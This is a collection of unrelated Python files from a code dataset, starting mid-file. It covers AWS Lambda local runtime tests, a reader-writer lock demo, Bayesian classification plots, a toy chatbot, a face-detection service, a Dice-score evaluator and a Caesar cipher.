@parameterized.expand([\n (\"zip\"),\n (\"jar\"),\n (\"ZIP\"),\n (\"JAR\")\n ])\n def test_echo_function_with_zip_file(self, file_name_extension):\n timeout = 3\n input_event = '\"this input should be echoed\"'\n expected_output = b'\"this input should be echoed\"'\n\n code_dir = self.code_dir[\"echo\"]\n with make_zip(code_dir, file_name_extension) as code_zip_path:\n\n config = FunctionConfig(name=\"helloworld\",\n runtime=RUNTIME,\n handler=HANDLER,\n code_abs_path=code_zip_path,\n layers=[],\n timeout=timeout)\n\n stdout_stream = io.BytesIO()\n stdout_stream_writer = StreamWriter(stdout_stream)\n\n self.runtime.invoke(config, input_event, stdout=stdout_stream_writer)\n\n actual_output = stdout_stream.getvalue()\n self.assertEquals(actual_output.strip(), expected_output)\n\n def test_check_environment_variables(self):\n variables = {\"var1\": \"value1\", \"var2\": \"value2\"}\n aws_creds = {\"region\": \"ap-south-1\", \"key\": \"mykey\", \"secret\": \"mysecret\"}\n\n timeout = 30\n input_event = \"\"\n\n stdout_stream = io.BytesIO()\n stdout_stream_writer = StreamWriter(stdout_stream)\n\n expected_output 
= {\n            \"AWS_SAM_LOCAL\": \"true\",\n            \"AWS_LAMBDA_FUNCTION_MEMORY_SIZE\": \"1024\",\n            \"AWS_LAMBDA_FUNCTION_TIMEOUT\": \"30\",\n            \"AWS_LAMBDA_FUNCTION_HANDLER\": \"index.handler\",\n\n            # Values coming from AWS Credentials\n            \"AWS_REGION\": \"ap-south-1\",\n            \"AWS_DEFAULT_REGION\": \"ap-south-1\",\n            \"AWS_ACCESS_KEY_ID\": \"mykey\",\n            \"AWS_SECRET_ACCESS_KEY\": \"mysecret\",\n\n            # Custom environment variables\n            \"var1\": \"value1\",\n            \"var2\": \"value2\"\n        }\n\n        config = FunctionConfig(name=\"helloworld\",\n                                runtime=RUNTIME,\n                                handler=HANDLER,\n                                code_abs_path=self.code_dir[\"envvar\"],\n                                layers=[],\n                                memory=MEMORY,\n                                timeout=timeout)\n\n        # Set the appropriate environment variables\n        config.env_vars.variables = variables\n        config.env_vars.aws_creds = aws_creds\n\n        self.runtime.invoke(config, input_event, stdout=stdout_stream_writer)\n\n        actual_output = json.loads(stdout_stream.getvalue().strip().decode('utf-8'))  # Output is a JSON String. Deserialize.\n\n        # Make sure all key/value from expected_output is present in actual_output\n        for key, value in expected_output.items():\n            # Do the key check first to print a nice error message when it fails\n            self.assertTrue(key in actual_output, \"'{}' should be in environment variable output\".format(key))\n            self.assertEquals(actual_output[key], expected_output[key],\n                              \"Value of environment variable '{}' differs from expectation\".format(key))\n\n\nclass TestLambdaRuntime_MultipleInvokes(TestCase):\n\n    def setUp(self):\n        self.code_dir = nodejs_lambda(SLEEP_CODE)\n\n        Input = namedtuple('Input', [\"timeout\", \"sleep\", \"check_stdout\"])\n        self.inputs = [\n            Input(sleep=1, timeout=10, check_stdout=True),\n            Input(sleep=2, timeout=10, check_stdout=True),\n            Input(sleep=3, timeout=10, check_stdout=True),\n            Input(sleep=5, timeout=10, check_stdout=True),\n            Input(sleep=8, timeout=10, check_stdout=True),\n            Input(sleep=13, timeout=12, check_stdout=False),  # Must timeout\n            Input(sleep=21, timeout=20, check_stdout=False),  # Must timeout. So stdout will be empty\n        ]\n        random.shuffle(self.inputs)\n\n        container_manager = ContainerManager()\n        layer_downloader = LayerDownloader(\"./\", \"./\")\n        self.lambda_image = LambdaImage(layer_downloader, False, False)\n        self.runtime = LambdaRuntime(container_manager, self.lambda_image)\n\n    def tearDown(self):\n        shutil.rmtree(self.code_dir)\n\n    def _invoke_sleep(self, timeout, sleep_duration, check_stdout, exceptions=None):\n\n        name = \"sleepfunction_timeout_{}_sleep_{}\".format(timeout, sleep_duration)\n        print(\"Invoking function \" + name)\n        try:\n            stdout_stream = io.BytesIO()\n            stdout_stream_writer = StreamWriter(stdout_stream)\n\n            config = FunctionConfig(name=name,\n                                    runtime=RUNTIME,\n                                    handler=HANDLER,\n                                    code_abs_path=self.code_dir,\n                                    layers=[],\n                                    memory=1024,\n                                    timeout=timeout)\n\n            self.runtime.invoke(config, sleep_duration, stdout=stdout_stream_writer)\n            actual_output = stdout_stream.getvalue().strip()  # Must output the sleep duration\n            if check_stdout:\n                self.assertEquals(actual_output.decode('utf-8'), str(sleep_duration))\n        except Exception as ex:\n            if exceptions is not None:\n                exceptions.append({\"name\": name, \"error\": ex})\n            else:\n                raise\n\n    def test_serial(self):\n        \"\"\"\n        Making sure we can invoke multiple times on the same ``LambdaRuntime`` object. 
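# --- Added example (editor's sketch; not part of the original test module) ---
# The environment-variable test above loops over expected key/value pairs and
# asserts each one is present and equal. On Python 3 the same subset check can
# be written in one line with dict items views:
expected = {"AWS_SAM_LOCAL": "true", "var1": "value1"}
actual = {"AWS_SAM_LOCAL": "true", "var1": "value1", "PATH": "/usr/bin"}
assert expected.items() <= actual.items(), "missing or mismatched env vars"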
This test is necessary to\n        catch timers that were not cancelled, race conditions, memory leak issues, etc.\n        \"\"\"\n\n        for input in self.inputs:\n            self._invoke_sleep(input.timeout, input.sleep, input.check_stdout)\n\n    def test_parallel(self):\n        \"\"\"\n        Making sure we can invoke multiple times on the same ``LambdaRuntime`` object. This test is necessary to\n        catch timers that were not cancelled, race conditions, memory leak issues, etc.\n        \"\"\"\n\n        threads = []\n\n        # Collect all exceptions from threads. This is important because exceptions raised in a thread don't bubble\n        # up to the main thread. Therefore the test runner will never catch them and fail the test.\n        exceptions = []\n\n        for input in self.inputs:\n\n            t = threading.Thread(name='thread', target=self._invoke_sleep,\n                                 args=(input.timeout, input.sleep, input.check_stdout, exceptions))\n            t.setDaemon(True)\n            t.start()\n            threads.append(t)\n\n        # Wait for all threads to exit\n        for t in threads:\n            t.join()\n\n        for e in exceptions:\n            print(\"-------------\")\n            print(\"ERROR in function \" + e[\"name\"])\n            print(e[\"error\"])\n            print(\"-------------\")\n\n        if len(exceptions) > 0:\n            raise AssertionError(\"Test failed. See print outputs above for details on the thread that failed\")\n","sub_path":"tests/functional/local/lambdafn/test_runtime.py","file_name":"test_runtime.py","file_ext":"py","file_size_in_byte":10848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"33252347","text":"import logging\nfrom random import randint\nimport time\nfrom threading import Thread\n\n# _______________________________________________________________________\n# Imports\n\nfrom threading import Lock\n\n# _______________________________________________________________________\n# Class\n\n\nclass RWLock(object):\n    # Constructor\n\n    def __init__(self):\n\n        self.w_lock = Lock()\n        self.num_r_lock = Lock()\n        self.num_r = 0 \n\n    # Reading methods.\n\n    def r_acquire(self):\n        self.num_r_lock.acquire()\n        self.num_r += 1\n        if self.num_r == 1:\n            self.w_lock.acquire()\n        self.num_r_lock.release()\n\n    def r_release(self):\n        assert self.num_r > 0\n        self.num_r_lock.acquire()\n        self.num_r -= 1\n        if self.num_r == 0:\n            self.w_lock.release()\n        self.num_r_lock.release()\n\n    # Writing methods.\n\n    def w_acquire(self):\n        self.w_lock.acquire()\n\n    def w_release(self):\n        self.w_lock.release()\n\n\n#-------------------------------------------------------------------------------//\n#---------------------------------------------------------------------//\n\n\n\nlockRW = RWLock()\n\npartido = [\"\",0,\"\",0] \n\nequipos = [\"Boca\", \"River\", \"Racing\", \"Independiente\", \"San Lorenzo\", \"Huracán\", \n\"Gimnasia\", \"Estudiantes\", \"Velez\", \"Ferro\", \"Lanus\", \"Quilmes\"]\n\nlogging.basicConfig(format='%(asctime)s.%(msecs)03d [%(threadName)s] - %(message)s', datefmt='%H:%M:%S', level=logging.INFO)\n\n\n\ndef escritor(id):\n    global partido # Give the writer access to partido and equipos.\n    global equipos\n    nombre = f\"Escritor numero:{id}\" # Name for easier handling.\n    while True:\n        nRandom1 = randint(0,len(equipos)-1)\n        nRandom2= randint(0,len(equipos)-1)\n        while nRandom1 == nRandom2:\n            nRandom2 = randint(0,len(equipos)-1)\n        lockRW.w_acquire()\n        try:\n            partido[0] = equipos[nRandom1]\n            partido[1] = randint(0,3)\n            partido[2] = equipos[nRandom2]\n            partido[3] = randint(0,3)\n            logging.info(f\"{nombre} Actualizo el partido.\")\n        finally:\n            lockRW.w_release()\n        time.sleep(randint(1,2))\n\ndef lector(id):\n    
global partido\n    global equipos\n    nombre = f\"Lector-{id}\"\n    while True:\n        lockRW.r_acquire()\n        try:\n            logging.info(f\"\"\"{nombre}: El resultado fue: {partido[0]}:{partido[1]} - {partido[2]}:{partido[3]}\"\"\")\n        finally:\n            lockRW.r_release()\n        time.sleep(randint(1,2))\n\n\ndef main():\n    hilos = []\n    for i in range(1):\n        writer = Thread(target=escritor, args=(i,))\n        logging.info(f\"Arrancando escritor:{i}\")\n        writer.start()\n        hilos.append(writer)\n    for i in range(4):\n        reader = Thread(target=lector,args=(i,))\n        logging.info(f\"Arrancando lector:{i}\")\n        reader.start()\n        hilos.append(reader)\n    for thread in hilos:\n        thread.join()\n\nif __name__ == '__main__':\n    main()","sub_path":"rwlock_PARTIDOFUTBOL.py","file_name":"rwlock_PARTIDOFUTBOL.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"48165921","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport matplotlib\nmatplotlib.rcParams['mathtext.fontset'] = 'stix'\nmatplotlib.rcParams['font.family'] = 'STIXGeneral'\n\ndef sig(x):\n    return 1/(1 + np.exp(-x))\n\nnp.random.seed(0)\nx_all = np.load('x.npy')\ny_all = np.load('y.npy')\nos.chdir(os.getcwd() + '/rich_images/bayesian_master_pred')\n\nSw = np.array([[10, 0],\n               [0, 10]], dtype = 'float64')\nMw = np.array([[0, 0]], dtype = 'float64').T\n\n\nw1_range = np.linspace(-10, 10, 275)\nw2_range = np.linspace(-10, 10, 300)\nw1_, w2_ = np.meshgrid(w1_range, w2_range)\ngrid = np.stack([w1_, w2_], axis = 2)\n\nidx1, idx2 = np.arange(0, 275), np.arange(0, 300)\nidx1, idx2 = np.meshgrid(idx1, idx2)\nidx = np.stack([idx1, idx2], axis = 2)\nidx = np.reshape(idx, (-1, 2))\n\nrate = 0.01\nfor n in range(51):\n    \n    fig = plt.figure(figsize=(20, 5))\n    \n    x = x_all[:n+1, :]\n    y = y_all[:n+1]\n\n    \n    w = np.array([[0, 0]], dtype = 'float64').T\n    for i in range(1000):\n        grad = -np.linalg.inv(Sw).dot(w - Mw)\n        sigmas = sig(x.dot(w))\n        lik_term = np.sum((y*(1 - sigmas) - (1 - y)*sigmas)*x, axis = 0)\n        lik_term = lik_term.reshape((-1, 1))\n        grad += lik_term\n        w += grad*rate\n\n\n    sigmas = sig(x.dot(w))\n    S_g = np.linalg.inv(Sw) + (x.T).dot(x*sigmas*(1-sigmas))\n    S_g = S_g\n    \n    plt.subplot(142)\n    sigs = None\n    lik = None\n    if n == 0:\n        sigs = sig((grid).dot(x.T))[:, :, 0]\n        lik = (sigs**y)*(1-sigs)**(1-y)\n    else:\n        sigs = sig((grid).dot(x[:-1].T))[:, :, -1]\n        lik = (sigs**y[-1])*(1-sigs)**(1-y[-1])\n    plt.contourf(-w1_range, w2_range, lik,\n                 cmap = 'coolwarm', alpha = 0.5)\n##    plt.title('Likelihood \n(observation {})'.format(n+1), fontsize = 18)\n##    plt.xlabel(r'$b$', fontsize = 18)\n##    plt.ylabel(r'$w$', fontsize = 18)\n##    plt.xticks(fontsize = 13)\n##    plt.yticks(fontsize = 13)\n##    plt.locator_params(axis='y', nbins = 5)\n##    plt.locator_params(axis='x', nbins = 5)\n    plt.xticks([])\n    plt.yticks([])\n\n    \n\n    plt.subplot(141)\n    prior = None\n    if n == 0:\n        prior = np.exp(-1/2*np.sum(grid.dot(np.linalg.inv(Sw))*grid, axis = 2))\n    else:\n        sigs = sig((grid).dot(x[:-1].T))[:, :, -1]\n        lik = (sigs**y[-1])*(1-sigs)**(1-y[-1])\n        prior = np.exp(-1/2*np.sum(grid.dot(np.linalg.inv(Sw))*grid, axis = 2))\n        sigs_prev = sig((grid).dot(x.T))[:, :, :-1]\n\n        y_ = y[:-1].reshape((-1))\n        lik_prev = np.prod((sigs_prev**y_)*(1-sigs_prev)**(1-y_), axis = 2)\n        prior *= lik_prev\n    \n    plt.contourf(-w1_range, w2_range, prior,\n                 cmap = 'coolwarm', alpha = 0.5)\n##    if n == 0:\n##        plt.title('Prior \n(before any observations)', fontsize = 18)\n##    elif n == 1:\n##        plt.title('Prior \n(after 1 observation)', fontsize = 
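# --- Added example (editor's sketch; not part of the original records) ---
# Minimal usage of the RWLock class from the rwlock_PARTIDOFUTBOL.py record
# above: any number of readers may hold the lock at once, while a writer waits
# for exclusive access. Assumes the RWLock class defined above is in scope.
lock = RWLock()
shared = []

def read_snapshot():
    lock.r_acquire()
    try:
        return list(shared)  # consistent copy taken under the read lock
    finally:
        lock.r_release()

def append_item(item):
    lock.w_acquire()
    try:
        shared.append(item)
    finally:
        lock.w_release()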
18)\n## else:\n## plt.title('Prior \\n(after {} observations)'.format(n), fontsize = 18)\n## plt.xlabel(r'$b$', fontsize = 18)\n## plt.ylabel(r'$w$', fontsize = 18)\n## plt.xticks(fontsize = 13)\n## plt.yticks(fontsize = 13)\n## plt.locator_params(axis='y', nbins = 5)\n## plt.locator_params(axis='x', nbins = 5)\n plt.xticks([])\n plt.yticks([])\n\n plt.subplot(143)\n post = None\n if n == 0:\n prior = np.exp(-1/2*np.sum(grid.dot(np.linalg.inv(Sw))*grid, axis = 2))\n sigs = sig((grid).dot(x.T))[:, :, :]\n post = prior*lik\n else:\n prior = np.exp(-1/2*np.sum(grid.dot(np.linalg.inv(Sw))*grid, axis = 2))\n sigs = sig((grid).dot(x.T))[:, :, :]\n\n y_ = y.reshape((-1))\n lik = np.prod((sigs**y_)*(1-sigs)**(1-y_), axis = 2)\n post = lik*prior\n \n plt.contourf(-w1_range, w2_range, post,\n cmap = 'coolwarm', alpha = 0.5)\n## if n == 0:\n## plt.title('Exact posterior \\n(after 1 observation)', fontsize = 18)\n## else:\n## plt.title('Exact posterior \\n(after {} observations)'.format(n+1), fontsize = 18)\n## \n## plt.xlabel(r'$b$', fontsize = 18)\n## plt.ylabel(r'$w$', fontsize = 18)\n## plt.xticks(fontsize = 13)\n## plt.yticks(fontsize = 13)\n## plt.locator_params(axis='y', nbins = 5)\n## plt.locator_params(axis='x', nbins = 5)\n plt.xticks([])\n plt.yticks([])\n \n flat_post = np.reshape(post, (-1))/post.sum()\n\n colors = ['red', 'green', 'blue']\n w1, w2 = [], []\n \n for i in range(3):\n sample_idx = np.random.choice(np.arange(0, flat_post.shape[0]), p = flat_post)\n grid_idx = idx[sample_idx]\n w1.append(w1_range[grid_idx[0]])\n w2.append(w2_range[grid_idx[1]])\n plt.scatter(-w1_range[grid_idx[0]], w2_range[grid_idx[1]],\n color = colors[i], marker = 'x')\n\n plt.subplot(144)\n xs = np.linspace(-3, 4, 100)\n for i in range(3):\n plt.plot(xs, sig(w2[i]*xs+w1[i]), color = colors[i])\n \n## plt.xlabel(r'$x$', fontsize = 18)\n## plt.ylabel(r'$p(C_{red})$', fontsize = 18)\n## plt.xticks(fontsize = 13)\n## plt.yticks([0, 0.5, 1], fontsize = 13)\n plt.xticks([])\n plt.yticks([])\n reds, blues = x[np.where(y == 1)[0], 1], x[np.where(y == 0)[0], 1]\n plt.scatter(reds, np.zeros_like(reds), marker = 'x', color = 'black', s = 40)\n plt.scatter(blues, np.zeros_like(blues), marker = 'o', color = 'white',\n edgecolor = 'black', s = 50)\n## plt.title('Data space\\n' + r'(three (w, b) samples)', fontsize = 18)\n\n print('bayesian_master_pred', str(n).zfill(2) + '.pdf')\n plt.tight_layout(w_pad = 8)\n plt.savefig(str(n).zfill(2) + '.pdf')\n plt.close(fig)\n\n \n","sub_path":"classification/bayesian_class_master_pred.py","file_name":"bayesian_class_master_pred.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"142450605","text":"# mika.py\n# by Jonno, Dec 2018\n# talk with Mika, the cute anime girl\n\n# save messages as variables\nintro = \"Hi! I'm Mika, a cute anime girl!\"\nask = \"How can I help? (Enter help for suggestions.)\\n\"\nconfused = \"I don't understand\"\njoke = \"My dog has no nose. 
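# --- Added example (editor's sketch; not part of the original records) ---
# The bayesian_class_master_pred.py record above evaluates the posterior on a
# parameter grid as prior * likelihood for logistic regression. The same idea
# in miniature for a single weight with a standard-normal prior:
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

x = np.array([-1.0, 0.5, 2.0])   # toy inputs
y = np.array([0.0, 1.0, 1.0])    # toy binary labels
w_grid = np.linspace(-5.0, 5.0, 201)

prior = np.exp(-0.5 * w_grid ** 2)                    # N(0, 1), unnormalised
p = sigmoid(np.outer(w_grid, x))                      # shape (grid, n_data)
likelihood = np.prod(p ** y * (1 - p) ** (1 - y), axis=1)
posterior = prior * likelihood
posterior /= posterior.sum()                          # normalise over the grid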
It smells terribly!\"\nhelpList = \"Try entering:\\njoke\\nexit\"\n\n# begin interactions\nprint(intro)\n\nwhile 1:\n\tuserInput = input(ask)\n\n\tif userInput == \"exit\":\n\t\texit()\n\n\telif userInput == \"help\":\n\t\tprint(helpList)\n\n\telif userInput == \"joke\":\n\t\tprint(joke)\n\n\telse:\n\t\tprint(confused, userInput, \".\")","sub_path":"mika.py","file_name":"mika.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"272612124","text":"import sys\ninput = sys.stdin.readline\nINF = sys.maxsize\n\nsentence = input().rstrip()\n# Without the line below, the last number would never be added or subtracted\nsentence += '+'\ntmp = \"\"\nplus = 0\nminus = 0\nindex = INF\nfor i in range(len(sentence)):\n    if sentence[i] == '-':\n        index = i\n        break\n\nfor i in range(len(sentence)):\n    letter = sentence[i]\n    if letter == ')' or letter == '(':\n        continue\n    else:\n        # letter is a digit\n        if letter.isdigit():\n            tmp += letter\n        # letter is an operator\n        else:\n            if i > index:\n                minus += int(tmp)\n            else:\n                plus += int(tmp)\n            tmp = \"\"\nprint(plus - minus)\n\n\"\"\"\nSolution\nThree things matter in this problem: removing the parentheses, parsing the numbers out of the string, and subtracting every number that comes after a '-' sign.\nOr so I thought, but the input already has the parentheses removed...?\nNumbers are parsed using tmp: while looping, digits are appended to tmp, and when an operator appears, tmp is converted to a number.\nIn the first loop the index of the '-' sign is stored in index; in the second loop, when a number is recognised, it is added to plus if its position is smaller than index,\nand to minus otherwise.\n\"\"\"\n","sub_path":"season2/season2/week6/minkyu/1541.py","file_name":"1541.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"509413964","text":"import os\nimport json\nimport torch\nimport bentoml\n\nfrom bentoml.adapters import ImageInput\nfrom bentoml.artifact import PytorchModelArtifact\n\nfrom core.model.utils import euclidean_distance, download_ftp, delete_file\nfrom core.model.face_align_trans import warp_and_crop_face\n\n# os.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\n\nclass FTPServerConfig:\n    def __init__(self):\n        # if use ftp\n        self.use_model_from_ftp = json.loads(os.environ.get(\"USE_MODEL_FROM_FTP\", \"False\").lower())\n        self.ftp_host = os.environ.get(\"FTP_SERVER_HOST\", \"127.0.0.1\")\n        self.ftp_port = int(os.environ.get(\"FTP_SERVER_PORT\", 22))\n        self.ftp_user = os.environ.get(\"FTP_SERVER_USER\", \"dps\")\n        self.ftp_password = os.environ.get(\"FTP_SERVER_PASSWORD\", \"123456\")\n\n\nclass ConfigFaceDetector(FTPServerConfig):\n    \"\"\"\n    Config of FaceDetector(RetinaFace)\n    \"\"\"\n\n    def __init__(self):\n        super().__init__()\n        import torch\n        from core.model.retinaface import RetinaFace\n        from core.model.model import cfg_mnet\n        from core.model.model import MobileNetV1\n\n        self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n        # config of MobileNetV1\n        self.model_backbone = MobileNetV1\n        self.model_config = cfg_mnet\n        self.model_backbone_path = \"static/retina_backbone.tar\"\n        self.model = RetinaFace(self.model_backbone, self.model_config, self.device,\n                                backbone_path=self.model_backbone_path)\n        self.model_path = \"static/retina_mobilenet.pth\"\n\n        # config of Resnet50\n        # self.model_backbone = models.resnet50\n        # self.model_config = cfg_re50\n        # self.model = RetinaFace(self.model_backbone, self.model_config, self.device)\n        # self.model_path = \"./data/pretrained_model/retina_res50.pth\"\n\n        self.threshold = float(os.environ.get('DETECTOR_THRESHOLD', 0.97531))\n        self.face_size = (112, 112)\n        self.eyes_distance = float(os.environ.get('EYES_DISTANCE', 12)) # pixels\n        
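# --- Added example (editor's sketch; not part of the original module) ---
# The FaceDetector below filters detections by comparing landmark separations
# (eye-to-eye, and eye-midpoint to mouth-midpoint) against the pixel thresholds
# configured above. A plausible implementation of the imported
# `euclidean_distance` helper, shown for reference only (the real helper lives
# in core.model.utils and may differ):
import numpy as np

def euclidean_distance_sketch(a, b):
    return float(np.linalg.norm(np.asarray(a, dtype=float) - np.asarray(b, dtype=float)))

left_eye, right_eye = (30.0, 40.0), (60.0, 40.0)
assert euclidean_distance_sketch(left_eye, right_eye) == 30.0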
self.central_points_face_distances = float(os.environ.get('CENTRAL_POINTS_FACE_DISTANCES', 12)) # pixels\n\n\nclass FaceDetector:\n    def __init__(self):\n        self.__config = ConfigFaceDetector()\n        self.__detector = self.__config.model\n\n        if not self.__config.use_model_from_ftp:\n            self.__detector.load_model(self.__config.model_path)\n        else:\n            # load model from ftp server\n            # first, download model\n            download_ftp(\n                file_path=self.__config.model_path,\n                host=self.__config.ftp_host,\n                port=self.__config.ftp_port,\n                user=self.__config.ftp_user,\n                password=self.__config.ftp_password\n            )\n            self.__detector.load_model(\"tmp\") # modify this line + delete\n            delete_file(\"tmp\")\n\n        from core.model.face_align_trans import get_reference_facial_points\n        self.__reference = get_reference_facial_points(default_square=True)\n\n    def forward(self, image):\n        result = []\n        for face_detail in self.__detector.detect(image, self.__config.threshold):\n            border = [idx for idx, pos in enumerate(face_detail[:4]) if pos > 5000 or pos < 0]\n\n            if len(border) > 0:\n                continue\n\n            box = tuple(face_detail[:4])\n            land_mask = face_detail[5:].reshape((5, 2))\n\n            noise_line = euclidean_distance((land_mask[0] + land_mask[1])/2, (land_mask[3] + land_mask[4])/2)\n            eyes_line = euclidean_distance(land_mask[1], land_mask[0])\n\n            # if noise_line < self.__config.central_points_face_distances or eyes_line < self.__config.eyes_distance\\\n            #         or eyes_line/noise_line <= 0.8 or eyes_line/noise_line >= 0.98:\n            if noise_line < self.__config.central_points_face_distances or eyes_line < self.__config.eyes_distance:\n                continue\n\n            result.append((land_mask, box))\n\n        return result\n\n    def warp_crop_face(self, image, land_mask, output_size=None):\n        if output_size is None:\n            output_size = self.__config.face_size\n\n        return warp_and_crop_face(image, land_mask, self.__reference, output_size)\n\n\nnet = FaceDetector()\n","sub_path":"test/bento.py","file_name":"bento.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"290580915","text":"def global_(answers):\n    return not answers['folder_packages']\n\n\nquestions = [\n    {\n        'name': 'package_manager',\n        'type': 'list',\n        'message': 'Please select the appropriate package manager',\n        'choices': [\n            # Package managers available\n            {\n                'name': 'Chocolatey'\n            },\n            {\n                'name': 'Composer'\n            },\n            {\n                'name': 'PIP'\n            },\n            {\n                'name': 'NPM'\n            },\n            {\n                'name': 'Yarn'\n            },\n            {\n                'name': 'NuGet'\n            },\n            {\n                'name': 'Homebrew'\n            },\n            {\n                'name': 'APT'\n            }\n        ]\n    },\n    {\n        'name': 'folder_packages',\n        'type': 'confirm',\n        'message': 'Are the packages available locally? 
(containerized)',\n        'default': False,\n    },\n    {\n        'name': 'global_packages',\n        'type': 'confirm',\n        'message': 'Are the packages available globally?',\n        'default': True,\n        'when': global_,\n    }\n]\n","sub_path":"package_uninstaller/extra/global_vars.py","file_name":"global_vars.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"493096904","text":"import nibabel as nib\nimport numpy as np\nimport glob\n\n\ndef dice_calculation(gt, seg):\n\n    gt = nib.load(gt).get_data() \n    seg = nib.load(seg).get_data() \n    seg = np.squeeze(seg) \n    vox_gt = np.sum(gt) \n    vox_seg = np.sum(seg) \n    common = np.sum(gt & seg) \n    dice = (2*common)/(vox_gt+vox_seg) \n    return dice\n\n\ndef outliers_modified_z_score(ys):\n\n    ys = np.asarray(ys)\n    threshold = 3.5\n\n    median_y = np.median(ys)\n    median_absolute_deviation_y = np.median([np.abs(y - median_y) for y in ys])\n    modified_z_scores = [0.6745 * (y - median_y) / median_absolute_deviation_y\n                         for y in ys]\n    return np.where(np.abs(modified_z_scores) > threshold)\n\n\nrefs = sorted(glob.glob('/home/fsforazz/Desktop/mouse_nifti/Mask_0*.nii.gz'))\nsegs = sorted(glob.glob('/home/fsforazz/niftynet/models/mouse_lung_ct/'\n                        'segmentation_output_mouse_lung/*.nii.gz'))\nall_dices = []\n\nfor seg in segs: \n    seg_num = seg.split('/')[-1].split('_')[1] \n    ref = [x for x in refs if seg_num in x][0] \n    dice = dice_calculation(ref, seg) \n    all_dices.append(dice)\n\noutliers = outliers_modified_z_score(all_dices)\nprint('Mean Dice: {0} \\nStd: {1} \\nMax Dice: {2}\\nMin Dice {3}'\n      .format(np.mean(all_dices), np.std(all_dices), np.max(all_dices), np.min(all_dices)))\nfor ol in outliers[0]:\n    print('Outlier: {0}, Dice: {1}'.format(segs[ol], all_dices[ol]))\nprint('Done!')\n","sub_path":"scripts/segmentation_eval.py","file_name":"segmentation_eval.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"501238770","text":"\r\nfrom utils.dataLetters import *\r\nfrom utils.messagefct import *\r\n\r\n\r\nclass Cesar:\r\n\r\n    @staticmethod\r\n    def findOppositeKeyCesar(k):\r\n        \"\"\"\r\n        Return the key symmetric to the key passed as argument\r\n        \"\"\"\r\n        k = k % 26\r\n        oppk = 26 - k\r\n\r\n        return oppk\r\n    # ...\r\n\r\n    @staticmethod\r\n    def encrypt(m, kc, nl):\r\n        \"\"\"\r\n        Return the cryptogram for message m with key kc using the Caesar cipher\r\n        \"\"\"\r\n\r\n        if not isValidMessage(m):\r\n            m = getMessage(m)\r\n        # ...\r\n\r\n        # reduce kc if necessary\r\n        kc = kc % 26\r\n\r\n        c = []\r\n        for letter in m:\r\n            l = ord(letter) - minUpperLetter\r\n            c_i = (l + kc) % 26\r\n            c_i = c_i + minUpperLetter\r\n            c.append(chr(c_i))\r\n        #...\r\n        return setCryptogrammeByBloc(''.join(c), nl)\r\n    # ...\r\n\r\n    @staticmethod\r\n    def decrypt(c, kc):\r\n        \"\"\"\r\n        Decrypt the given cryptogram whose encryption key kc is known\r\n        \"\"\"\r\n        if not isValidMessage(c):\r\n            c = getMessage(c)\r\n        # ...\r\n\r\n        # reduce kc\r\n        kc = kc % 26\r\n\r\n        # deduce kd from it\r\n        kd = 26 - kc\r\n\r\n\r\n        m = []\r\n        for letter in c:\r\n            l = ord(letter) - minUpperLetter\r\n            m_i = (l + kd) % 26\r\n            m_i = m_i + minUpperLetter\r\n            m.append(chr(m_i))\r\n        #...\r\n        return ''.join(m)\r\n    # ...\r\n\r\n\r\n    @staticmethod\r\n    def interceptCryptoOnly(c):\r\n        \"\"\"\r\n        Try every possible key to recover the plaintext message\r\n\r\n        Return a list of 26 strings.\r\n        \"\"\"\r\n\r\n        dicoSol = 
[c]\r\n        print(\"CLE:\tMESSAGE:\")\r\n        for i in range(1,26):\r\n            tmp = Cesar.decrypt(c, i)\r\n            print('{0}\t{1}'.format(i, tmp))\r\n            dicoSol.append(tmp)\r\n        # ...\r\n\r\n        return dicoSol\r\n    # ...\r\n\r\n    @staticmethod\r\n    def interceptCouplesConnus(m, c):\r\n        \"\"\"\r\n        Takes a plaintext message and its cryptogram.\r\n\r\n        Return the encryption key\r\n        \"\"\"\r\n\r\n\r\n        if not isValidMessage(m):\r\n            m = getMessage(m)\r\n        # ...\r\n\r\n        if not isValidMessage(c):\r\n            c = getMessage(c)\r\n        # ...\r\n\r\n        # Here it suffices to look at the first element of each of the two strings\r\n        m0 = m[0]\r\n        c0 = c[0]\r\n\r\n        m0 = ord(m0) - minUpperLetter\r\n        c0 = ord(c0) - minUpperLetter\r\n\r\n        kc = m0 - c0\r\n        if kc < 0:\r\n            kc = kc + 26\r\n        # ...\r\n\r\n        return kc\r\n        #...\r\n\r\n# ...\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    m = 'Salut je viens de Villetaneuse'\r\n    key = 8\r\n    c = Cesar.encrypt(m,key , 5)\r\n    print('Message en clair: ', m)\r\n    print(\"Clef: \", key)\r\n    print('Cryptogramme: ',c)\r\n    print('Test decrypt: ', Cesar.decrypt(c, 8))\r\n    #Cesar.interceptCryptoOnly(c)\r\n\r\n# ...","sub_path":"src/cesar.py","file_name":"cesar.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
